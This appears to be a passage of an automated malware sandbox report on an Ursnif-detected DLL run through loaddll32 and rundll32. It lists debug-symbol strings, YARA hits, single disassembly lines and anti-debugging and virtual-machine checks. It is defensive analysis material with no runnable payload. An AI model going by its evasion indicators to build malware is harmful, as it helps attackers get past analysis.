                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: wsspicli.pdbWt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbw source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbCt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.879269729.0000000000684000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb]t source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbbv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbhv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbpv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbI source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbOt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdbIt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbkt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb|v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdb^v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbEm5 source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb&v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbyt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb,v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891777281.00000000009AC000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdbC source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbRv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbDv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E30AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04CDAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E30AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0497ABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0497AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match File source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara match File source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: WerFault.exe, 0000000C.00000003.926283769.00000000048B6000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWm32\advapi32.dll
Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.902665043.0000000004560000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.938125643.0000000005307000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000000F.00000003.936044986.0000000005307000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E32C325 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E338861 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E37DFDA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E37DEAA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E37DBB5 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E32C325 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E338861 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E37DFDA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E37DEAA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E37DBB5 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort (6 occurrences)
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
